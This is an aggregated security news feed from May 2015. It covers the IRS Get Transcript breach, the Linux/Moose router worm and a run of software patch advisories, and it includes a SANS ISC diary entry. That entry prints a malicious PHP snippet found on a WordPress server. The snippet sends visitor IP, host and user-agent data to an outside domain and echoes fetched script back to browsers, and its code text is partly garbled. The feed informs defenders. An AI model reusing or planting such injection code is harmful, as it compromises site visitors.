(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
LinuxSecurity.com: Security Report Summary
LinuxSecurity.com: OpenLDAP could be made to crash if it received specially crafted networktraffic.

In an official statement issued today, the IRS announced that it has shut down an online service to obtain tax records after determining that "unusual activity had taken place on the application, which indicates that unauthorized third parties had access to some accounts on the transcript application." An initial review of that activity revealed "access was gained to more than 100,000 accounts through the Get Transcript application," according to the IRS statement.

After the IRS disclosed more information, it became clear the user data was not obtained because of a direct hack of government systems. Rather, weak authentication used by the IRS to protect access to taxpayer data is likely at fault. The attackers were able to acquire taxpayer records using stolen personal identifying information, possibly pulled from online financial fraud marketplaces.

The Get Transcript application, a feature of the IRS' site that allows taxpayers to download tax return and tax payment transaction data, was apparently targeted by financial fraudsters between February and mid-May. The service was shut down last week as the IRS investigated the activity, which may have been linked to the fraudulent filing of tax returns and transfer of tax refunds. Attempts were made to access over 200,000 accounts; roughly half failed because of incorrect information inputted during the IRS' authentication process.

Read 7 remaining paragraphs | Comments


A worm that targets cable and DSL modems, home routers, and other embedded computers is turning those devices into a proxy network for launching armies of fraudulent Instagram, Twitter, and Vine accounts as well as fake accounts on other social networks. The new worm can also hijack routers' DNS service to route requests to a malicious server, steal unencrypted social media cookies such as those used by Instagram, and then use those cookies to add "follows" to fraudulent accounts. This allows the worm to spread itself to embedded systems on the local network that use Linux-based operating systems.

The malware, dubbed "Linux/Moose" by Olivier Bilodeau and Thomas Dupuy of the security firm ESET Canada Research, exploits routers open to connections from the Internet via Telnet by performing brute-force login attempts using default or common administrative credentials. Once connected, the worm installs itself on the targeted device.

Moose spreads itself using a file named elan2—"élan" is the French word for moose, Bilodeau and Dupuy explained in their report. Once installed, the malware begins to watch traffic passing through the router for unencrypted cookies from Web browsers and mobile applications, which may be passed to unencrypted sites that leverage social network features:

Read 6 remaining paragraphs | Comments


Thanks to one of our readers, for sending us this snipped of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability):

#2b8008# ">">/* turn off error reporting */
@ini_set(display_errors ">/* do not display errors to the user */
$wp_mezd8610 = @$_SERVER[HTTP_USER_AGENT">/* only run the code if this is Chrome or IE and not a bot */

if (( preg_match (/Gecko|MSIE/i, $wp_mezd8610) !preg_match (/bot/i, $wp_mezd8610)))
{ "># Assemble a URL like http://errorcontent.com/content?ip=[client ip]referer=[server host name]ua=[user agent]

mezd098610=http://.error.content..com/.content./? ip=.$_SERVER[REMOTE_ADDR].referer=.urlencode($_SERVER[HTTP_HOST]).ua="># check if we have the curl extension installed

if (function_exists(curl_init) function_exists(curl_exec"># if we dont have curl, try file_get_contents which requires allow_url_fopen.

elseif (function_exists(file_get_contents) @ini_get(allow_url_fopen"># or try fopen as a last resort
elseif (function_exists(fopen) function_exists(stream_get_contents)) {[email protected]_get_contents(@fopen($wp_mezd098610, r}}

ubstr($wp_8610mezd,1,3) === scr"># The data retrieved will be echoed back to the user if it starts with the string scr.

I havent been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com ?

According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to37.1.207.26, which is owned by a british ISP. Any help as to the nature of this snippet willbe appreciated.

Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
GAITHERSBURG, Md.—As part of a national collaborative effort to strengthen the scientific basis for forensic evidence used in the criminal justice system, the U.S. Commerce Departments National Institute of Standards and Technology ...

Posted by InfoSec News on May 26


By Jeremy Wagstaf
The Age
May 26, 2015

Security researcher Chris Roberts made headlines last month when he was
hauled off a plane in New York by the Federal Bureau of Investigation and
accused of hacking into flight controls via his underseat entertainment

Other security researchers...

Posted by InfoSec News on May 26


By Aliya Sternstein
May 25, 2015

Nearly a week after extending the terms of its original proposal, U.S.
Cyber Command revoked a 5-year contract offer that aimed to backfill
significant staffing shortages.

Cyber Command has called off a sweeping solicitation that would have
outsourced support for cyberspying and network attacks...

Posted by InfoSec News on May 26


By Jeremy Kirk
IDG News Service
May 24, 2015

An unredacted version of a database said to be stolen from Adult Friend
Finder is being offered for sale for 70 bitcoins, or around $17,000.

ROR[RG], the nickname of the person who claims to have breached the large
online hookup site, wrote on Saturday in an...
LinuxSecurity.com: The 3.19.8 update contains a number of important fixes across the treeThe 3.19.7 update contains a number of important updates across the treeThe 3.19.6 stable updates contains a number of important fixes across the tree
LinuxSecurity.com: updated to 8u45-b14. fixes rhbz#1123870
LinuxSecurity.com: **WordPress 4.2.2 Security and Maintenance Release*** Upstream announcement https://wordpress.org/news/2015/05/wordpress-4-2-2/
LinuxSecurity.com: * **ZF2015-04**: Zend\Mail and Zend\Http were both susceptible to CRLF Injection Attack vectors (for HTTP, this is often referred to as HTTP Response Splitting). Both components were updated to perform header value validations to ensure no values contain characters not detailed in their corresponding specifications, and will raise exceptions on detection. Each also provides new facilities for both validating and filtering header values prior to injecting them into header classes. If you use either Zend\Mail or Zend\Http (which includes users of Zend\Mvc), we recommend upgrading immediately.
LinuxSecurity.com: Security fix BZ1205130 - patch for CTCP Denial of Service
LinuxSecurity.com: phpMyAdmin (2015-05-13)=============================== - [security] CSRF vulnerability in setup - [security] Vulnerability allowing man-in-the-middle attack
LinuxSecurity.com: Privilege escalation via emulated floppy disk drive [XSA-133, CVE-2015-3456] (#1221153)
LinuxSecurity.com: Security fix for CVE-2015-3885
LinuxSecurity.com: Update to new upstream.
LinuxSecurity.com: Update to new upstream.
LinuxSecurity.com: * CVE-2015-3456: (VENOM) fdc: out-of-bounds fifo buffer memory access (bz #1221152)
LinuxSecurity.com: 14 May 2015, **PHP 5.6.9**Core:* Fixed bug #69467 (Wrong checked for the interface by using Trait). (Laruence)* Fixed bug #69420 (Invalid read in zend_std_get_method). (Laruence)* Fixed bug #60022 ("use statement [...] has no effect" depends on leading backslash). (Nikita)* Fixed bug #67314 (Segmentation fault in gc_remove_zval_from_buffer). (Dmitry)* Fixed bug #68652 (segmentation fault in destructor). (Dmitry)* Fixed bug #69419 (Returning compatible sub generator produces a warning). (Nikita)* Fixed bug #69472 (php_sys_readlink ignores misc errors from GetFinalPathNameByHandleA). (Jan Starke)* Fixed bug #69364 (PHP Multipart/form-data remote dos Vulnerability). (Stas)* Fixed bug #69403 (str_repeat() sign mismatch based memory corruption). (Stas)* Fixed bug #69418 (CVE-2006-7243 fix regressions in 5.4+). (Stas)* Fixed bug #69522 (heap buffer overflow in unpack()). (Stas)FTP:* Fixed bug #69545 (Integer overflow in ftp_genlist() resulting in heap overflow). (Stas)ODBC:* Fixed bug #69354 (Incorrect use of SQLColAttributes with ODBC 3.0). (Anatol)* Fixed bug #69474 (ODBC: Query with same field name from two tables returns incorrect result). (Anatol)* Fixed bug #69381 (out of memory with sage odbc driver). (Frederic Marchall, Anatol Belski)OpenSSL:* Fixed bug #69402 (Reading empty SSL stream hangs until timeout). (Daniel Lowrey)PCNTL:* Fixed bug #68598 (pcntl_exec() should not allow null char). (Stas)PCRE:* Upgraded pcrelib to 8.37.Phar:* Fixed bug #69453 (Memory Corruption in phar_parse_tarfile when entry filename starts with null). (Stas)
[SECURITY] [DSA 3273-1] tiff security update
Internet Storm Center Infocon Status